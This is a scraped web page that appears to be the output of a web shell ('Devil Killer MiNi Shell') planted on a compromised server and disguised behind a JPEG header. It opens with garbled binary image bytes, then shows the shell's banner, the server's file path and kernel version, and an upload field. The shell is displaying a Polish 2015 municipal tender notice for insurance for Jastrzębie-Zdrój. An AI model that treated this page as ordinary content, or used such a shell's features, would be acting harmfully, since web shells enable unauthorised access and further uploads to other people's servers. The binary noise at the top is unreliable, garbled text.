JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151125/319352-N-2015.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Kompleksowe ubezpieczenie  dla Miasta Jastrzębie-Zdrój</b><br>
<b>Numer ogłoszenia: 319352 - 2015; data zamieszczenia: 25.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jastrzębie Zdrój , Al. Józefa Piłsudskiego 60, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 0-32 47 85 133, faks 0-32 47 85 350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe ubezpieczenie  dla Miasta Jastrzębie-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest usługa obejmująca swym zakresem ubezpieczenie mienia, odpowiedzialności cywilnej, komunikacyjne pojazdów oraz osobowe dla Miasta Jastrzębia-Zdrój oraz wybranych jednostek organizacyjnych. 

Przedmiot Zamówienia został podzielony na sześć części:
CZĘŚĆ 1 - ubezpieczenie - mienia, OC i NNW dla Miasta Jastrzębie-Zdrój i wybranych jednostek
1)	Ubezpieczenie mienia od ognia i innych zdarzeń losowych.
2)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk.
3)	Ubezpieczenie mienia od kradzieży z włamaniem, rabunku i wandalizmu.
4)	Ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzenia działalności oraz z tytułu posiadania mienia.
5)	Ubezpieczenie OC zarządcy nieruchomości.
6)	Ubezpieczenie NNW,
7)	Ubezpieczenie CARGO 
CZĘŚĆ 2 - ubezpieczenia pojazdów
1)	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów.
2)	Ubezpieczenie AUTO-CASCO.
3)	Ubezpieczenie NNW kierowców i pasażerów.
4)	Ubezpieczenie Assistance.
5)	Ubezpieczenie szyb samochodowych.
CZĘŚĆ 3 - ubezpieczenie strażaków
1)	Ubezpieczenie następstw nieszczęśliwych wypadków członków ochotniczych straży pożarnych.
2)	Ubezpieczenie następstw nieszczęśliwych wypadków dla jednostek Ochotniczych Straży Pożarnych.
CZĘŚĆ 4  - ubezpieczenie  kosztów leczenia i bagażu dla osób podczas zagranicznych podróży służbowych dla Miasta Jastrzębie-Zdrój
CZĘŚĆ 5  - ubezpieczenie obowiązkowe OC ppm na samochody przejęte dla Miasta Jastrzębie-Zdrój
CZĘŚĆ 6 - ubezpieczenie OC nadwyżkowej dla Miasta Jastrzębie-Zdrój i wybranych jednostek

Szczegółowy opis przedmiotu Zamówienia zawiera:

Dla CZĘŚCI 1 - Załącznik A do SIWZ,
Dla CZĘŚCI 2 - Załącznik B do SIWZ,
Dla CZĘŚCI 3 - Załącznik C do SIWZ,
Dla CZĘŚCI 4 - Załącznik D do SIWZ, 
Dla CZĘŚCI 5 - Załącznik E do SIWZ, 
Dla CZĘŚCI 6 - Załącznik F do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.51.00-4, 66.51.50.00-3, 66.51.54.00-7, 66.51.60.00-0, 66.51.61.00-1, 66.51.64.00-4, 66.51.93.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  wykaże,  że posiada  uprawnienia do wykonywania działalności ubezpieczeniowej 
w myśl ustawy z dnia 22 maja 2003 roku o działalności ubezpieczeniowej (tekst jednolity: Dz. U. 
z 2015 r. poz. 1206 z późn. zm.), zwanej dalej ustawą o działalności ubezpieczeniowej,
- w CZĘŚCI 1 co najmniej w grupie 1, 2, 7, 8, 9 i 13 Działu II Załącznika do ustawy o działalności ubezpieczeniowej;
- w CZĘŚCI 2 co najmniej w grupie 1, 2, 3, i 10 Działu II Załącznika do ustawy o działalności ubezpieczeniowej;
- w CZĘŚCI 3 co najmniej w grupie  1 i 2  Działu II Załącznika do ustawy o działalności ubezpieczeniowej.
- w CZĘŚCI 4 co najmniej w grupie 18 Działu II Załącznika do ustawy o działalności ubezpieczeniowej.
- w CZĘŚCI 5 co najmniej w grupie 10 Działu II Załącznika do ustawy o działalności ubezpieczeniowej.
- w CZĘŚCI 6 co najmniej w grupie 13 Działu II Załącznika do ustawy o działalności ubezpieczeniowej.

Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie Zamówienia, każdy z Wykonawców powinien samodzielnie spełniać warunek udziału w Postępowaniu określony powyżej

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz oferty sporządzony według wzoru właściwego dla danej Części Zamówienia, zgodny w treści z wzorem stanowiącym: 
dla zadania 1 - załącznik nr 1.1. ,
dla zadania 2 - załącznik nr 1.2. ,
dla zadania 3 - załącznik nr 1.3. ,
dla zadania 4 - załącznik nr 1.4.,
dla zadania 5 - załącznik nr 1.5 ,
dla zadania 6 - załącznik nr 1.6 ,
2.	Specyfikacja cenowa, sporządzony według wzoru właściwego dla danej Części Zamówienia,    zgodny w treści  z  wzorem stanowiącym:
dla zadania 1 - załącznik nr 2.1. ,
dla zadania 2 - załącznik nr 2.2. ,
dla zadania 3 - załącznik nr 2.3. ,
dla zadania 4 - załącznik nr 2.4. ,
dla zadania 5 - załącznik nr 2.5. ,
dla zadania 6 - załącznik nr 2.6.
		
3.	Pełnomocnictwo/pełnomocnictwa osoby/ osób uprawnionych do reprezentowania Wykonawcy w Postępowaniu, udzielone dla osoby/osób podpisujących ofertę i wymagane oświadczenia oraz poświadczające za zgodność z oryginałem dokumenty, o ile ta osoba/ te osoby nie zostały ujawnione we właściwym rejestrze dołączonym do oferty,
W przypadku Wykonawców wspólnie ubiegających się o udzielenie Zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie Zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy w sprawie Zamówienia publicznego,
Pełnomocnictwo należy przedłożyć w formie oryginału lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - KLAUZULE  FAKULTATYWNE - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej Umowy w stosunku do treści oferty. Istotne zmiany zawartej Umowy, o których mowa w zdaniu poprzednim oraz warunki dokonania zmiany Umowy zostały określone we wzorze Umowy stanowiącym odpowiednio:
dla CZĘŚCI 1 : 	Załącznik od nr 7.1 do SIWZ
dla CZĘŚCI 2 : 	Załącznik od nr 7.2 do SIWZ  
dla CZĘŚCI 3 : 	Załącznik od nr 7.3 do SIWZ 
dla CZĘŚCI 4 : 	Załącznik od nr 7.4 do SIWZ 
dla CZĘŚCI 5 :	Załącznik od nr 7.5 do SIWZ
dla CZĘŚCI 6 :	Załącznik od nr 7.6 do SIWZ
Zmiana Umowy może zostać dokonana w formie pisemnego aneksu, którego treść zostanie zaakceptowana przez obie strony. Inicjatorem zmian do Umowy może być zarówno Wykonawca jak i Zamawiający. 

1.	Strony przez istotne zmiany postanowień Umowy w stosunku do treści złożonej w Postępowaniu przez Ubezpieczyciela oferty, rozumieją takie zmiany, których wprowadzenie na etapie Postępowania o udzielenie zamówienia wpłynęłoby na krąg Wykonawców ubiegających się o zamówienie lub na wybór najkorzystniejszej oferty w Postępowaniu. Wszelkie inne zmiany postanowień Umowy w stosunku do treści złożonej w Postępowaniu przez Ubezpieczyciela oferty nie mają charakteru zmian istotnych.
2.	Ubezpieczający przewiduje możliwość istotnej zmiany postanowień Umowy w stosunku do treści oferty złożonej w Postępowaniu przez Ubezpieczyciela, polegających w szczególności na: 
2.1.	  zmianie wysokości sumy ubezpieczenia (gwarancyjnej) lub limitów odpowiedzialności,
2.2.	  zmianie wysokości składek ubezpieczeniowych.
3.	Warunkiem dokonania zmian określonych w ust. 1 i ust. 2 są uzasadnione potrzeby Ubezpieczającego lub Ubezpieczonych, a w szczególności:
3.1.	   sytuacja, w której Ubezpieczyciel wprowadzi do obrotu w czasie trwania Umowy zmiany do stosowanych przez niego wzorców umownych lub Ogólnych/ Szczególnych Warunków Ubezpieczenia, z zastrzeżeniem, że w odniesieniu do Umowy możliwe jest wprowadzenie jedynie zmian na korzyść Ubezpieczającego lub Ubezpieczonego,
3.2.	   gdy nastąpi zmiana w obowiązujących przepisach prawa lub zmiana istotnych z uwagi na charakter działalności Ubezpieczającego lub Ubezpieczonych stosunków umownych, która wpływa na ubezpieczenia zawarte w ramach Umowy,
3.3.	   będzie miała miejsce zmiana na rynku ubezpieczeniowym, z zastrzeżeniem, że w odniesieniu do Umowy możliwe jest wprowadzenie jedynie zmian na korzyść Ubezpieczającego lub Ubezpieczonego,
3.4.	   nastąpi istotna zmiana w strukturze organizacji Ubezpieczającego lub Ubezpieczonych, np. podział, połączenie, likwidacja lub im podobne.
4.	Zmiana postanowień zawartej Umowy może nastąpić wyłącznie za zgodą Ubezpieczającego i Ubezpieczyciela, wyrażoną w formie pisemnego aneksu do Umowy pod rygorem nieważności.
5.	Zmiana w zakresie danych dotyczących Ubezpieczającego, Ubezpieczonych lub Ubezpieczyciela, a w szczególności ich adresy lub nazwy, imiona i nazwiska osób uprawnionych do reprezentowania oraz osób odpowiedzialnych za wykonanie Umowy nie stanowią istotnej zmiany postanowień Umowy i nie wymagają zgody Stron. Zmiana, o której mowa w zdaniu poprzednim jest dokonywana jednostronnym oświadczeniem złożonym drugiej Stronie. 
6.	Zmiana podwykonawców wymaga pisemnej zgody Ubezpieczającego. 
7.	Ubezpieczający przewiduje odpowiednią zmianę wysokości wynagrodzenia należnego Ubezpieczycielowi w przypadku:
 7.1 zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2002 r., Nr 200, poz. 1679 z późn. zm.),
7.2	 zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia (Umowy) przez Ubezpieczyciela.
8.	W przypadku zmian określonych w ust. 7, Ubezpieczyciel może wystąpić do Ubezpieczającego z wnioskiem o zmianę wynagrodzenia, przedkładając odpowiednie dokumenty potwierdzające zasadność złożenia takiego wniosku. Ubezpieczyciel zobowiązany jest wykazać, że zaistniała zmiana, o której mowa w ust. 7, ma bezpośredni wpływ na koszty wykonania zamówienia (Umowy) oraz określić stopień, w jakim wpłynie ona na wysokość wynagrodzenia. 
9.	W przypadku zmiany, o której mowa w ust. 7 pkt. 7.1. wynagrodzenie Ubezpieczyciela ulegnie zmianie o wartość wzrostu całkowitego kosztu Ubezpieczyciela wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie (Umowę) do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
10.	W przypadku zmiany, o której mowa w ust. 7 pkt. 7.2. wynagrodzenie Ubezpieczyciela ulegnie zmianie o wartość całkowitego kosztu Ubezpieczyciela, jaką będzie on zobowiązany dodatkowo ponosić w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób wykonujących zamówienie (Umowę) na rzecz Ubezpieczającego lub Ubezpieczonych.
11.	Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust. 7.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jastrzębie -Zdrój, Al. Józefa Piłsudskiego 60
budynek A: pok. 008
44-335 Jastrzębie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2015 godzina 11:00, miejsce: Urząd Miasta Jastrzębie -Zdrój, Al. Józefa Piłsudskiego 60, pok. 008 B; 44-335 Jastrzębie-Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ubezpieczenie - mienia, OC i NNW dla Miasta Jastrzębie-Zdrój i wybranych jednostek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Ubezpieczenie mienia od ognia i innych zdarzeń losowych.
2)	Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk.
3)	Ubezpieczenie mienia od kradzieży z włamaniem, rabunku i wandalizmu.
4)	Ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzenia działalności oraz z tytułu posiadania mienia.
5)	Ubezpieczenie OC zarządcy nieruchomości.
6)	Ubezpieczenie NNW,
7)	Ubezpieczenie CARGO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.51.00-4, 66.51.50.00-3, 66.51.54.00-7, 66.51.60.00-0, 66.51.64.00-4, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE   FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ubezpieczenia pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów.
2)	Ubezpieczenie AUTO-CASCO.
3)	Ubezpieczenie NNW kierowców i pasażerów.
4)	Ubezpieczenie Assistance.
5)	Ubezpieczenie szyb samochodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.51.00-4, 66.51.50.00-3, 66.51.54.00-7, 66.51.61.00-1, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE   FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ubezpieczenie strażaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Ubezpieczenie następstw nieszczęśliwych wypadków członków ochotniczych straży pożarnych.
2)	Ubezpieczenie następstw nieszczęśliwych wypadków dla jednostek Ochotniczych Straży Pożarnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ubezpieczenie kosztów leczenia i bagażu dla osób podczas zagranicznych podróży służbowych dla Miasta Jastrzębie-Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie  kosztów leczenia i bagażu dla osób podczas zagranicznych podróży służbowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.51.00-4, 66.51.50.00-3, 66.51.54.00-7, 66.51.60.00-0, 66.51.64.00-4, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. KLAUZULE FAKULTATYWNE - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ubezpieczenie obowiązkowe OC ppm na samochody przejęte dla Miasta Jastrzębie-Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie OC ppm na samochody, które w wyniku wystąpienia do Sądu o stwierdzenie przepadku pojazdu na rzecz powiatu, stają się własnością Miasta Jastrzębie-Zdrój.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.61.00-1.</p></li>
